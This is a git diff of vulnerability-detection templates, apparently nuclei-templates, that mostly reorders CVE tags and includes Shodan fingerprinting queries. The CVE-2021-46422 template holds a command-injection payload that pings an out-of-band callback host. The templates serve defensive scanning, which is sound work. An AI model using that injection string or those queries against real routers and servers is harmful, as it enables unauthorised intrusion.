b/http/cves/2021/CVE-2021-43495.yaml index 86fd801224..9555dac969 100644 --- a/http/cves/2021/CVE-2021-43495.yaml +++ b/http/cves/2021/CVE-2021-43495.yaml @@ -24,7 +24,7 @@ info: max-request: 1 vendor: alquistai product: alquist - tags: cve,cve2021,lfi,alquist,alquistai + tags: cve2021,cve,lfi,alquist,alquistai http: - method: GET diff --git a/http/cves/2021/CVE-2021-43496.yaml b/http/cves/2021/CVE-2021-43496.yaml index 30766fe199..8e82cde1ce 100644 --- a/http/cves/2021/CVE-2021-43496.yaml +++ b/http/cves/2021/CVE-2021-43496.yaml @@ -24,7 +24,7 @@ info: max-request: 1 vendor: clustering_project product: clustering - tags: cve,cve2021,lfi,clustering,clustering_project + tags: cve2021,cve,lfi,clustering,clustering_project http: - method: GET diff --git a/http/cves/2021/CVE-2021-43510.yaml b/http/cves/2021/CVE-2021-43510.yaml index cc05909a0a..548cb476df 100644 --- a/http/cves/2021/CVE-2021-43510.yaml +++ b/http/cves/2021/CVE-2021-43510.yaml @@ -27,7 +27,7 @@ info: max-request: 2 vendor: simple_client_management_system_project product: simple_client_management_system - tags: cve,cve2021,simpleclientmanagement,sqli,auth-bypass,simple_client_management_system_project + tags: cve2021,cve,simpleclientmanagement,sqli,auth-bypass,simple_client_management_system_project http: - raw: diff --git a/http/cves/2021/CVE-2021-43574.yaml b/http/cves/2021/CVE-2021-43574.yaml index 7e698a9305..65c3d7fb65 100644 --- a/http/cves/2021/CVE-2021-43574.yaml +++ b/http/cves/2021/CVE-2021-43574.yaml @@ -29,7 +29,7 @@ info: vendor: atmail product: atmail shodan-query: http.html:"Powered by Atmail" - tags: cve,cve2021,atmail,xss + tags: cve2021,cve,atmail,xss http: - method: GET diff --git a/http/cves/2021/CVE-2021-43734.yaml b/http/cves/2021/CVE-2021-43734.yaml index fed685d6c4..22cb89324e 100644 --- a/http/cves/2021/CVE-2021-43734.yaml +++ b/http/cves/2021/CVE-2021-43734.yaml @@ -27,7 +27,7 @@ info: vendor: keking product: kkfileview shodan-query: http.html:"kkFileView" - tags: cve,cve2021,kkfileview,traversal,lfi,keking + tags: cve2021,cve,kkfileview,traversal,lfi,keking http: - method: GET diff --git a/http/cves/2021/CVE-2021-43778.yaml b/http/cves/2021/CVE-2021-43778.yaml index 65af477984..f3c53c3703 100644 --- a/http/cves/2021/CVE-2021-43778.yaml +++ b/http/cves/2021/CVE-2021-43778.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: glpi-project product: barcode - tags: glpi,cve,cve2021,lfi,plugin,traversal,glpi-project + tags: cve,cve2021,glpi,lfi,plugin,traversal,glpi-project http: - method: GET diff --git a/http/cves/2021/CVE-2021-43798.yaml b/http/cves/2021/CVE-2021-43798.yaml index 720152f189..d5cc9f6ddc 100644 --- a/http/cves/2021/CVE-2021-43798.yaml +++ b/http/cves/2021/CVE-2021-43798.yaml @@ -28,7 +28,7 @@ info: vendor: grafana product: grafana shodan-query: title:"Grafana" - tags: packetstorm,cve,cve2021,grafana,lfi + tags: cve2021,cve,packetstorm,grafana,lfi http: - method: GET diff --git a/http/cves/2021/CVE-2021-43810.yaml b/http/cves/2021/CVE-2021-43810.yaml index f0bb254ed9..95ab2c9978 100644 --- a/http/cves/2021/CVE-2021-43810.yaml +++ b/http/cves/2021/CVE-2021-43810.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: admidio product: admidio - tags: cve,cve2021,admidio,xss + tags: cve2021,cve,admidio,xss http: - method: GET diff --git a/http/cves/2021/CVE-2021-44077.yaml b/http/cves/2021/CVE-2021-44077.yaml index d91af0d730..9200356fa1 100644 --- a/http/cves/2021/CVE-2021-44077.yaml +++ b/http/cves/2021/CVE-2021-44077.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: zohocorp product: manageengine_servicedesk_plus - tags: rce,kev,msf,cve,cve2021,zoho,manageengine,zohocorp + tags: cve2021,cve,rce,kev,msf,zoho,manageengine,zohocorp http: - method: GET diff --git a/http/cves/2021/CVE-2021-44138.yaml b/http/cves/2021/CVE-2021-44138.yaml index bc5e751b3e..2fd9696fdb 100644 --- a/http/cves/2021/CVE-2021-44138.yaml +++ b/http/cves/2021/CVE-2021-44138.yaml @@ -27,7 +27,7 @@ info: vendor: caucho product: resin shodan-query: html:"Resin" - tags: cve,cve2021,resin,caucho,lfi + tags: cve2021,cve,resin,caucho,lfi http: - method: GET diff --git a/http/cves/2021/CVE-2021-44139.yaml b/http/cves/2021/CVE-2021-44139.yaml index 3bdbb94200..da59cfb411 100644 --- a/http/cves/2021/CVE-2021-44139.yaml +++ b/http/cves/2021/CVE-2021-44139.yaml @@ -25,7 +25,7 @@ info: vendor: hashicorp product: sentinel shodan-query: title:"Sentinel Dashboard" - tags: cve,cve2021,ssrf,alibaba,oast,misconfig,sentinel,hashicorp + tags: cve2021,cve,ssrf,alibaba,oast,misconfig,sentinel,hashicorp http: - method: GET diff --git a/http/cves/2021/CVE-2021-44152.yaml b/http/cves/2021/CVE-2021-44152.yaml index 62b0b76d2f..151006a3b6 100644 --- a/http/cves/2021/CVE-2021-44152.yaml +++ b/http/cves/2021/CVE-2021-44152.yaml @@ -30,7 +30,7 @@ info: product: reprise_license_manager shodan-query: http.html:"Reprise License Manager" google-query: inurl:"/goforms/menu" - tags: cve,packetstorm,cve2021,rlm,auth-bypass,reprisesoftware + tags: cve,cve2021,packetstorm,rlm,auth-bypass,reprisesoftware http: - method: GET diff --git a/http/cves/2021/CVE-2021-44228.yaml b/http/cves/2021/CVE-2021-44228.yaml index 75fa544168..6d00623db1 100644 --- a/http/cves/2021/CVE-2021-44228.yaml +++ b/http/cves/2021/CVE-2021-44228.yaml @@ -26,7 +26,7 @@ info: max-request: 2 vendor: apache product: log4j - tags: cve,cve2021,rce,oast,log4j,injection,kev,apache + tags: cve2021,cve,rce,oast,log4j,injection,kev,apache variables: rand1: '{{rand_int(111, 999)}}' rand2: '{{rand_int(111, 999)}}' diff --git a/http/cves/2021/CVE-2021-44451.yaml b/http/cves/2021/CVE-2021-44451.yaml index a34a540292..2e9595cbc1 100644 --- a/http/cves/2021/CVE-2021-44451.yaml +++ b/http/cves/2021/CVE-2021-44451.yaml @@ -27,7 +27,7 @@ info: vendor: apache product: superset shodan-query: http.favicon.hash:1582430156 - tags: cve,cve2021,apache,superset,default-login + tags: cve2021,cve,apache,superset,default-login http: - raw: diff --git a/http/cves/2021/CVE-2021-44515.yaml b/http/cves/2021/CVE-2021-44515.yaml index e45d67afda..00f294892a 100644 --- a/http/cves/2021/CVE-2021-44515.yaml +++ b/http/cves/2021/CVE-2021-44515.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: zohocorp product: manageengine_desktop_central - tags: cve,cve2021,zoho,rce,manageengine,kev,zohocorp + tags: cve2021,cve,zoho,rce,manageengine,kev,zohocorp http: - raw: diff --git a/http/cves/2021/CVE-2021-44528.yaml b/http/cves/2021/CVE-2021-44528.yaml index d56435f7ff..7e23acccd7 100644 --- a/http/cves/2021/CVE-2021-44528.yaml +++ b/http/cves/2021/CVE-2021-44528.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: rubyonrails product: rails - tags: seclists,cve,cve2021,redirect,rubyonrails + tags: cve2021,cve,seclists,redirect,rubyonrails http: - raw: diff --git a/http/cves/2021/CVE-2021-44529.yaml b/http/cves/2021/CVE-2021-44529.yaml index 13f65a8825..b9f8f30094 100644 --- a/http/cves/2021/CVE-2021-44529.yaml +++ b/http/cves/2021/CVE-2021-44529.yaml @@ -27,7 +27,7 @@ info: vendor: ivanti product: endpoint_manager_cloud_services_appliance shodan-query: title:"LANDesk(R) Cloud Services Appliance" - tags: cve2021,ivanti,epm,csa,injection,packetstorm,cve + tags: cve2021,cve,ivanti,epm,csa,injection,packetstorm http: - raw: diff --git a/http/cves/2021/CVE-2021-44848.yaml b/http/cves/2021/CVE-2021-44848.yaml index 32c8df3d64..5599d9009e 100644 --- a/http/cves/2021/CVE-2021-44848.yaml +++ b/http/cves/2021/CVE-2021-44848.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: cybelesoft product: thinfinity_virtualui - tags: cve,cve2021,exposure,thinfinity,packetstorm,virtualui,tenable,cybelesoft + tags: cve2021,cve,exposure,thinfinity,packetstorm,virtualui,tenable,cybelesoft http: - raw: diff --git a/http/cves/2021/CVE-2021-44910.yaml b/http/cves/2021/CVE-2021-44910.yaml index abb65c2e0f..373373f00b 100644 --- a/http/cves/2021/CVE-2021-44910.yaml +++ b/http/cves/2021/CVE-2021-44910.yaml @@ -8,7 +8,7 @@ info: SpringBlade is a comprehensive project upgraded and optimized from a commercial-grade project, featuring both a SpringCloud distributed microservice architecture and a SpringBoot monolithic microservice architecture. The SpringBlade framework has a default SIGN_KEY, which can be exploited by attackers to obtain sensitive information such as user account password logs. reference: - https://github.com/chillzhuang/blade-tool - tags: cve,cve2023,springblade,blade,info-leak + tags: cve2021,cve,springblade,blade,info-leak http: - raw: diff --git a/http/cves/2021/CVE-2021-45043.yaml b/http/cves/2021/CVE-2021-45043.yaml index ab1ee0cadc..296d8764c3 100644 --- a/http/cves/2021/CVE-2021-45043.yaml +++ b/http/cves/2021/CVE-2021-45043.yaml @@ -27,7 +27,7 @@ info: vendor: hd-network_real-time_monitoring_system_project product: hd-network_real-time_monitoring_system google-query: intitle:"HD-Network Real-time Monitoring System V2.0" - tags: camera,edb,cve,cve2021,hdnetwork,lfi,iot,hd-network_real-time_monitoring_system_project + tags: cve2021,cve,camera,edb,hdnetwork,lfi,iot,hd-network_real-time_monitoring_system_project http: - raw: diff --git a/http/cves/2021/CVE-2021-45046.yaml b/http/cves/2021/CVE-2021-45046.yaml index 537402d0ec..fa4d8b863c 100644 --- a/http/cves/2021/CVE-2021-45046.yaml +++ b/http/cves/2021/CVE-2021-45046.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: apache product: log4j - tags: cve,cve2021,rce,oast,log4j,injection,kev,apache + tags: cve2021,cve,rce,oast,log4j,injection,kev,apache http: - raw: - | diff --git a/http/cves/2021/CVE-2021-45092.yaml b/http/cves/2021/CVE-2021-45092.yaml index 9b9512b48e..52d2a20a34 100644 --- a/http/cves/2021/CVE-2021-45092.yaml +++ b/http/cves/2021/CVE-2021-45092.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: cybelesoft product: thinfinity_virtualui - tags: packetstorm,iframe,thinfinity,tenable,cve,cve2021,injection,cybelesoft + tags: cve2021,cve,packetstorm,iframe,thinfinity,tenable,injection,cybelesoft http: - method: GET diff --git a/http/cves/2021/CVE-2021-45232.yaml b/http/cves/2021/CVE-2021-45232.yaml index 74f3aa4f23..c5657db284 100644 --- a/http/cves/2021/CVE-2021-45232.yaml +++ b/http/cves/2021/CVE-2021-45232.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: apache product: apisix_dashboard - tags: cve,cve2021,apache,unauth,apisix + tags: cve2021,cve,apache,unauth,apisix http: - method: GET diff --git a/http/cves/2021/CVE-2021-45380.yaml b/http/cves/2021/CVE-2021-45380.yaml index 8f8b469078..14700733e0 100644 --- a/http/cves/2021/CVE-2021-45380.yaml +++ b/http/cves/2021/CVE-2021-45380.yaml @@ -25,7 +25,7 @@ info: vendor: appcms product: appcms shodan-query: http.html:"Powerd by AppCMS" - tags: cve,cve2021,appcms,xss + tags: cve2021,cve,appcms,xss http: - method: GET diff --git a/http/cves/2021/CVE-2021-45382.yaml b/http/cves/2021/CVE-2021-45382.yaml index 0d7e7cd17e..0b9f7c70b8 100644 --- a/http/cves/2021/CVE-2021-45382.yaml +++ b/http/cves/2021/CVE-2021-45382.yaml @@ -24,7 +24,7 @@ info: max-request: 1 vendor: dlink product: dir-820l_firmware - tags: cve,cve2021,dlink,kev,rce + tags: cve2021,cve,dlink,kev,rce variables: string1: "{{to_lower(rand_base(5))}}" string2: "{{to_lower(rand_base(6))}}" diff --git a/http/cves/2021/CVE-2021-45422.yaml b/http/cves/2021/CVE-2021-45422.yaml index 56df76c3c0..67ba9bba5a 100644 --- a/http/cves/2021/CVE-2021-45422.yaml +++ b/http/cves/2021/CVE-2021-45422.yaml @@ -29,7 +29,7 @@ info: vendor: reprisesoftware product: reprise_license_manager shodan-query: http.html:"Reprise License" - tags: cve,cve2021,reprise,xss,seclists,reprisesoftware + tags: cve2021,cve,reprise,xss,seclists,reprisesoftware http: - method: GET diff --git a/http/cves/2021/CVE-2021-45428.yaml b/http/cves/2021/CVE-2021-45428.yaml index 7047ec383f..ae965b0884 100644 --- a/http/cves/2021/CVE-2021-45428.yaml +++ b/http/cves/2021/CVE-2021-45428.yaml @@ -28,7 +28,7 @@ info: vendor: telesquare product: tlr-2005ksh_firmware shodan-query: http.html:"TLR-2005KSH" - tags: cve,cve2021,telesquare,intrusive,fileupload,packetstorm + tags: cve2021,cve,telesquare,intrusive,fileupload,packetstorm http: - raw: diff --git a/http/cves/2021/CVE-2021-45968.yaml b/http/cves/2021/CVE-2021-45968.yaml index 08b5567458..6298ccf7cd 100644 --- a/http/cves/2021/CVE-2021-45968.yaml +++ b/http/cves/2021/CVE-2021-45968.yaml @@ -28,7 +28,7 @@ info: max-request: 1 vendor: jivesoftware product: jive - tags: cve,cve2021,pascom,lfi,jivesoftware + tags: cve2021,cve,pascom,lfi,jivesoftware http: - raw: diff --git a/http/cves/2021/CVE-2021-46005.yaml b/http/cves/2021/CVE-2021-46005.yaml index 785b44ce20..bd3f1ae51e 100644 --- a/http/cves/2021/CVE-2021-46005.yaml +++ b/http/cves/2021/CVE-2021-46005.yaml @@ -25,7 +25,7 @@ info: max-request: 3 vendor: car_rental_management_system_project product: car_rental_management_system - tags: sourcecodester,authenticated,edb,cve,cve2021,xss,intrusive,car_rental_management_system_project + tags: cve2021,cve,sourcecodester,authenticated,edb,xss,intrusive,car_rental_management_system_project http: - raw: diff --git a/http/cves/2021/CVE-2021-46068.yaml b/http/cves/2021/CVE-2021-46068.yaml index 621884fc2f..102754f59f 100644 --- a/http/cves/2021/CVE-2021-46068.yaml +++ b/http/cves/2021/CVE-2021-46068.yaml @@ -28,7 +28,7 @@ info: max-request: 3 vendor: vehicle_service_management_system_project product: vehicle_service_management_system - tags: cve,cve2021,xss,vms,authenticated,vehicle_service_management_system_project + tags: cve2021,cve,xss,vms,authenticated,vehicle_service_management_system_project http: - raw: diff --git a/http/cves/2021/CVE-2021-46071.yaml b/http/cves/2021/CVE-2021-46071.yaml index cde09f75c2..66ae5dbbad 100644 --- a/http/cves/2021/CVE-2021-46071.yaml +++ b/http/cves/2021/CVE-2021-46071.yaml @@ -28,7 +28,7 @@ info: max-request: 3 vendor: vehicle_service_management_system_project product: vehicle_service_management_system - tags: cve,cve2021,xss,vms,authenticated,vehicle_service_management_system_project + tags: cve2021,cve,xss,vms,authenticated,vehicle_service_management_system_project http: - raw: diff --git a/http/cves/2021/CVE-2021-46072.yaml b/http/cves/2021/CVE-2021-46072.yaml index e38ccfa7eb..d76c101057 100644 --- a/http/cves/2021/CVE-2021-46072.yaml +++ b/http/cves/2021/CVE-2021-46072.yaml @@ -28,7 +28,7 @@ info: max-request: 3 vendor: vehicle_service_management_system_project product: vehicle_service_management_system - tags: cve,cve2021,xss,vms,authenticated,vehicle_service_management_system_project + tags: cve2021,cve,xss,vms,authenticated,vehicle_service_management_system_project http: - raw: diff --git a/http/cves/2021/CVE-2021-46073.yaml b/http/cves/2021/CVE-2021-46073.yaml index 0555f15927..b8181e5c3e 100644 --- a/http/cves/2021/CVE-2021-46073.yaml +++ b/http/cves/2021/CVE-2021-46073.yaml @@ -28,7 +28,7 @@ info: max-request: 3 vendor: vehicle_service_management_system_project product: vehicle_service_management_system - tags: cve,cve2021,xss,vms,authenticated,vehicle_service_management_system_project + tags: cve2021,cve,xss,vms,authenticated,vehicle_service_management_system_project http: - raw: diff --git a/http/cves/2021/CVE-2021-46107.yaml b/http/cves/2021/CVE-2021-46107.yaml index b72dcbed17..8735401ce9 100644 --- a/http/cves/2021/CVE-2021-46107.yaml +++ b/http/cves/2021/CVE-2021-46107.yaml @@ -29,7 +29,7 @@ info: product: ligeo_basics shodan-query: title:"Ligeo" fofa-query: title="Ligeo" - tags: cve,cve2021,ligeo,ssrf,lfr,ligeo-archives + tags: cve2021,cve,ligeo,ssrf,lfr,ligeo-archives http: - raw: diff --git a/http/cves/2021/CVE-2021-46381.yaml b/http/cves/2021/CVE-2021-46381.yaml index b8ea4ff65f..98445d68b1 100644 --- a/http/cves/2021/CVE-2021-46381.yaml +++ b/http/cves/2021/CVE-2021-46381.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: dlink product: dap-1620_firmware - tags: lfi,router,packetstorm,cve,cve2021,dlink + tags: cve2021,cve,lfi,router,packetstorm,dlink http: - method: POST diff --git a/http/cves/2021/CVE-2021-46387.yaml b/http/cves/2021/CVE-2021-46387.yaml index de652fe759..52c4fc610e 100644 --- a/http/cves/2021/CVE-2021-46387.yaml +++ b/http/cves/2021/CVE-2021-46387.yaml @@ -28,7 +28,7 @@ info: vendor: zyxel product: zywall_2_plus_internet_security_appliance_firmware shodan-query: http.title:"Zywall2Plus" - tags: cve,cve2021,xss,zyxel,edb + tags: cve2021,cve,xss,zyxel,edb http: - method: GET diff --git a/http/cves/2021/CVE-2021-46417.yaml b/http/cves/2021/CVE-2021-46417.yaml index 911ef91c61..fbd7157deb 100644 --- a/http/cves/2021/CVE-2021-46417.yaml +++ b/http/cves/2021/CVE-2021-46417.yaml @@ -29,7 +29,7 @@ info: vendor: franklinfueling product: colibri_firmware shodan-query: http.html:"Franklin Fueling Systems" - tags: packetstorm,cve,cve2021,franklinfueling,lfi + tags: cve2021,cve,packetstorm,franklinfueling,lfi http: - method: GET diff --git a/http/cves/2021/CVE-2021-46422.yaml b/http/cves/2021/CVE-2021-46422.yaml index 2c26d97401..3f77ed5e8d 100644 --- a/http/cves/2021/CVE-2021-46422.yaml +++ b/http/cves/2021/CVE-2021-46422.yaml @@ -30,7 +30,7 @@ info: vendor: telesquare product: sdt-cs3b1_firmware shodan-query: html:"SDT-CW3B1" - tags: packetstorm,cve,cve2021,telesquare,rce,router,injection,edb + tags: cve2021,cve,packetstorm,telesquare,rce,router,injection,edb variables: cmd: "ping${IFS}-c${IFS}1${IFS}{{interactsh-url}}" diff --git a/http/cves/2021/CVE-2021-46424.yaml b/http/cves/2021/CVE-2021-46424.yaml index a70cb01db2..3e7c4da141 100644 --- a/http/cves/2021/CVE-2021-46424.yaml +++ b/http/cves/2021/CVE-2021-46424.yaml @@ -28,7 +28,7 @@ info: vendor: telesquare product: tlr-2005ksh_firmware shodan-query: http.html:"TLR-2005KSH" - tags: cve,cve2021,telesquare,intrusive,packetstorm + tags: cve2021,cve,telesquare,intrusive,packetstorm http: - raw: diff --git a/http/cves/2021/CVE-2021-46704.yaml b/http/cves/2021/CVE-2021-46704.yaml index c3fefa7f23..f95eb57ab4 100644 --- a/http/cves/2021/CVE-2021-46704.yaml +++ b/http/cves/2021/CVE-2021-46704.yaml @@ -30,7 +30,7 @@ info: vendor: genieacs product: genieacs shodan-query: http.favicon.hash:-2098066288 - tags: cve,cve2021,genieacs,rce + tags: cve2021,cve,genieacs,rce http: - method: GET diff --git a/http/cves/2022/CVE-2022-0087.yaml b/http/cves/2022/CVE-2022-0087.yaml index 4ad76d5375..44d96cdfa1 100644 --- a/http/cves/2022/CVE-2022-0087.yaml +++ b/http/cves/2022/CVE-2022-0087.yaml @@ -16,7 +16,7 @@ info: vendor: keystonejs product: keystone framework: node.js - tags: cve,cve2022,keystone,redirect,xss + tags: cve,cve2022,keystone,redirect,xss,node.js,keystonejs http: - method: GET diff --git a/http/cves/2022/CVE-2022-0140.yaml b/http/cves/2022/CVE-2022-0140.yaml index 9b7da91a37..5e8073a2a8 100644 --- a/http/cves/2022/CVE-2022-0140.yaml +++ b/http/cves/2022/CVE-2022-0140.yaml @@ -27,7 +27,7 @@ info: vendor: vfbpro product: visual_form_builder framework: wordpress - tags: wpscan,cve,cve2022,xss,wordpress,vfbpro + tags: cve,cve2022,wpscan,xss,wordpress,vfbpro http: - raw: diff --git a/http/cves/2022/CVE-2022-0147.yaml b/http/cves/2022/CVE-2022-0147.yaml index a163b95d95..29d3a73369 100644 --- a/http/cves/2022/CVE-2022-0147.yaml +++ b/http/cves/2022/CVE-2022-0147.yaml @@ -29,7 +29,7 @@ info: vendor: cookieinformation product: wp-gdpr-compliance framework: wordpress - tags: cve2022,wordpress,xss,wp,authenticated,cve,wp-plugin,wp-gdpr-compliance,wpscan,cookieinformation + tags: cve2022,cve,wordpress,xss,wp,authenticated,wp-plugin,wp-gdpr-compliance,wpscan,cookieinformation http: - raw: diff --git a/http/cves/2022/CVE-2022-0148.yaml b/http/cves/2022/CVE-2022-0148.yaml index d243bf4c73..ea72ddbc93 100644 --- a/http/cves/2022/CVE-2022-0148.yaml +++ b/http/cves/2022/CVE-2022-0148.yaml @@ -27,7 +27,7 @@ info: vendor: premio product: mystickyelements framework: wordpress - tags: xss,wp-plugin,authenticated,wpscan,cve,cve2022,wordpress,premio + tags: cve,cve2022,xss,wp-plugin,authenticated,wpscan,wordpress,premio http: - raw: diff --git a/http/cves/2022/CVE-2022-0149.yaml b/http/cves/2022/CVE-2022-0149.yaml index b0ab05e2d3..4fd4ed123f 100644 --- a/http/cves/2022/CVE-2022-0149.yaml +++ b/http/cves/2022/CVE-2022-0149.yaml @@ -26,7 +26,7 @@ info: vendor: visser product: store_exporter_for_woocommerce framework: wordpress - tags: wpscan,cve,cve2022,wordpress,wp-plugin,xss,woocommerce,authenticated,visser + tags: cve,cve2022,wpscan,wordpress,wp-plugin,xss,woocommerce,authenticated,visser http: - raw: diff --git a/http/cves/2022/CVE-2022-0150.yaml b/http/cves/2022/CVE-2022-0150.yaml index 7966869e6f..df6405cd69 100644 --- a/http/cves/2022/CVE-2022-0150.yaml +++ b/http/cves/2022/CVE-2022-0150.yaml @@ -26,7 +26,7 @@ info: vendor: wp_accessibility_helper_project product: wp_accessibility_helper framework: wordpress - tags: wordpress,wp-plugin,wp,wpscan,cve,cve2022,xss,wp_accessibility_helper_project + tags: cve,cve2022,wordpress,wp-plugin,wp,wpscan,xss,wp_accessibility_helper_project http: - method: GET diff --git a/http/cves/2022/CVE-2022-0169.yaml b/http/cves/2022/CVE-2022-0169.yaml index 0065f55318..e62497a95d 100644 --- a/http/cves/2022/CVE-2022-0169.yaml +++ b/http/cves/2022/CVE-2022-0169.yaml @@ -29,7 +29,7 @@ info: product: photo_gallery framework: wordpress publicwww-query: "/wp-content/plugins/photo-gallery" - tags: wpscan,cve,cve2022,wp,wp-plugin,wordpress,sqli,photo-gallery,10web + tags: cve,cve2022,wpscan,wp,wp-plugin,wordpress,sqli,photo-gallery,10web variables: num: "999999999" diff --git a/http/cves/2022/CVE-2022-0189.yaml b/http/cves/2022/CVE-2022-0189.yaml index bd2e59137e..d73675c1fb 100644 --- a/http/cves/2022/CVE-2022-0189.yaml +++ b/http/cves/2022/CVE-2022-0189.yaml @@ -26,7 +26,7 @@ info: vendor: wprssaggregator product: wp_rss_aggregator framework: wordpress - tags: wpscan,cve,cve2022,wordpress,xss,wp-plugin,authenticated,wprssaggregator + tags: cve,cve2022,wpscan,wordpress,xss,wp-plugin,authenticated,wprssaggregator http: - raw: diff --git a/http/cves/2022/CVE-2022-0201.yaml b/http/cves/2022/CVE-2022-0201.yaml index 6bd6d91628..e3e40c5459 100644 --- a/http/cves/2022/CVE-2022-0201.yaml +++ b/http/cves/2022/CVE-2022-0201.yaml @@ -26,7 +26,7 @@ info: vendor: permalink_manager_lite_project product: permalink_manager_lite framework: wordpress - tags: wp-plugin,wpscan,cve,cve2022,xss,wordpress,permalink_manager_lite_project + tags: cve,cve2022,wp-plugin,wpscan,xss,wordpress,permalink_manager_lite_project http: - method: GET diff --git a/http/cves/2022/CVE-2022-0206.yaml b/http/cves/2022/CVE-2022-0206.yaml index 528330ec2c..549b58e36c 100644 --- a/http/cves/2022/CVE-2022-0206.yaml +++ b/http/cves/2022/CVE-2022-0206.yaml @@ -27,7 +27,7 @@ info: vendor: newstatpress_project product: newstatpress framework: wordpress - tags: xss,wp,authenticated,cve2022,wordpress,wp-plugin,newstatpress,wpscan,cve,newstatpress_project + tags: cve,cve2022,xss,wp,authenticated,wordpress,wp-plugin,newstatpress,wpscan,newstatpress_project http: - raw: diff --git a/http/cves/2022/CVE-2022-0208.yaml b/http/cves/2022/CVE-2022-0208.yaml index 4adbefebf5..a51730a54b 100644 --- a/http/cves/2022/CVE-2022-0208.yaml +++ b/http/cves/2022/CVE-2022-0208.yaml @@ -26,7 +26,7 @@ info: vendor: mappresspro product: mappress framework: wordpress - tags: cve2022,mappress,xss,wordpress,wp-plugin,wpscan,cve,mappresspro + tags: cve2022,cve,mappress,xss,wordpress,wp-plugin,wpscan,mappresspro http: - method: GET diff --git a/http/cves/2022/CVE-2022-0212.yaml b/http/cves/2022/CVE-2022-0212.yaml index e5262830b6..597d016033 100644 --- a/http/cves/2022/CVE-2022-0212.yaml +++ b/http/cves/2022/CVE-2022-0212.yaml @@ -28,7 +28,7 @@ info: vendor: 10web product: spidercalendar framework: wordpress - tags: cve,cve2022,xss,wpscan,wordpress,wp-plugin,wp,spider-event-calendar,unauthenticated,10web + tags: cve2022,cve,xss,wpscan,wordpress,wp-plugin,wp,spider-event-calendar,unauthenticated,10web http: - method: GET diff --git a/http/cves/2022/CVE-2022-0218.yaml b/http/cves/2022/CVE-2022-0218.yaml index 028fa3ad8a..56f782d977 100644 --- a/http/cves/2022/CVE-2022-0218.yaml +++ b/http/cves/2022/CVE-2022-0218.yaml @@ -27,7 +27,7 @@ info: vendor: codemiq product: wordpress_email_template_designer framework: wordpress - tags: wordpress,wp-plugin,xss,cve,cve2022,codemiq + tags: cve,cve2022,wordpress,wp-plugin,xss,codemiq http: - method: GET diff --git a/http/cves/2022/CVE-2022-0220.yaml b/http/cves/2022/CVE-2022-0220.yaml index 4a20579f8d..dfe0bc2a0d 100644 --- a/http/cves/2022/CVE-2022-0220.yaml +++ b/http/cves/2022/CVE-2022-0220.yaml @@ -25,7 +25,7 @@ info: vendor: welaunch product: wordpress_gdpr\&ccpa framework: wordpress - tags: wpscan,cve,cve2022,wordpress,wp-plugin,wp,xss,unauth,welaunch + tags: cve2022,cve,wpscan,wordpress,wp-plugin,wp,xss,unauth,welaunch http: - raw: diff --git a/http/cves/2022/CVE-2022-0228.yaml b/http/cves/2022/CVE-2022-0228.yaml index 0520ae68d9..fe76bb684c 100644 --- a/http/cves/2022/CVE-2022-0228.yaml +++ b/http/cves/2022/CVE-2022-0228.yaml @@ -26,7 +26,7 @@ info: product: popup_builder framework: wordpress publicwww-query: /wp-content/plugins/popup-builder/ - tags: cve,cve2022,wordpress,wp-plugin,wp,wpscan,popup-builder,sygnoos + tags: cve2022,cve,wordpress,wp-plugin,wp,wpscan,popup-builder,sygnoos,sqli http: - raw: diff --git a/http/cves/2022/CVE-2022-0234.yaml b/http/cves/2022/CVE-2022-0234.yaml index a1aad89cbb..618d791fcf 100644 --- a/http/cves/2022/CVE-2022-0234.yaml +++ b/http/cves/2022/CVE-2022-0234.yaml @@ -30,7 +30,7 @@ info: product: woocs framework: wordpress google-query: inurl:"wp-content/plugins/woocommerce-currency-switcher" - tags: wpscan,cve,cve2022,wordpress,wp-plugin,wp,xss,woocs,pluginus + tags: cve2022,cve,wpscan,wordpress,wp-plugin,wp,xss,woocs,pluginus http: - raw: diff --git a/http/cves/2022/CVE-2022-0271.yaml b/http/cves/2022/CVE-2022-0271.yaml index 3923274547..694e45b5c1 100644 --- a/http/cves/2022/CVE-2022-0271.yaml +++ b/http/cves/2022/CVE-2022-0271.yaml @@ -27,7 +27,7 @@ info: vendor: thimpress product: learnpress framework: wordpress - tags: wp,wp-plugin,wordpress,cve,cve2022,learnpress,wpscan,xss,thimpress + tags: cve2022,cve,wp,wp-plugin,wordpress,learnpress,wpscan,xss,thimpress http: - method: GET diff --git a/http/cves/2022/CVE-2022-0288.yaml b/http/cves/2022/CVE-2022-0288.yaml index 46fb756868..febc98b6a7 100644 --- a/http/cves/2022/CVE-2022-0288.yaml +++ b/http/cves/2022/CVE-2022-0288.yaml @@ -25,7 +25,7 @@ info: vendor: ad_inserter_pro_project product: ad_inserter_pro framework: wordpress - tags: wordpress,xss,wpscan,cve,cve2022,ad_inserter_pro_project + tags: cve,cve2022,wordpress,xss,wpscan,ad_inserter_pro_project http: - method: POST diff --git a/http/cves/2022/CVE-2022-0342.yaml b/http/cves/2022/CVE-2022-0342.yaml index 76953b11a3..451c52024a 100644 --- a/http/cves/2022/CVE-2022-0342.yaml +++ b/http/cves/2022/CVE-2022-0342.yaml @@ -24,7 +24,7 @@ info: vendor: zyxel product: usg40_firmware fofa-query: body="/2FA-access.cgi" && body="zyxel zyxel_style1" - tags: cve,cve2022,zyxel,auth-bypass,router + tags: cve2022,cve,zyxel,auth-bypass,router http: - method: GET diff --git a/http/cves/2022/CVE-2022-0346.yaml b/http/cves/2022/CVE-2022-0346.yaml index 833adb9f4c..f1279f023b 100644 --- a/http/cves/2022/CVE-2022-0346.yaml +++ b/http/cves/2022/CVE-2022-0346.yaml @@ -28,7 +28,7 @@ info: vendor: xmlsitemapgenerator product: xml_sitemap_generator framework: wordpress - tags: wpscan,cve,cve2022,wp,wordpress,wp-plugin,xss,www-xml-sitemap-generator-org,xmlsitemapgenerator + tags: cve2022,cve,wpscan,wp,wordpress,wp-plugin,xss,www-xml-sitemap-generator-org,xmlsitemapgenerator http: - method: GET diff --git a/http/cves/2022/CVE-2022-0349.yaml b/http/cves/2022/CVE-2022-0349.yaml index bd3cb56508..63acecf6a7 100644 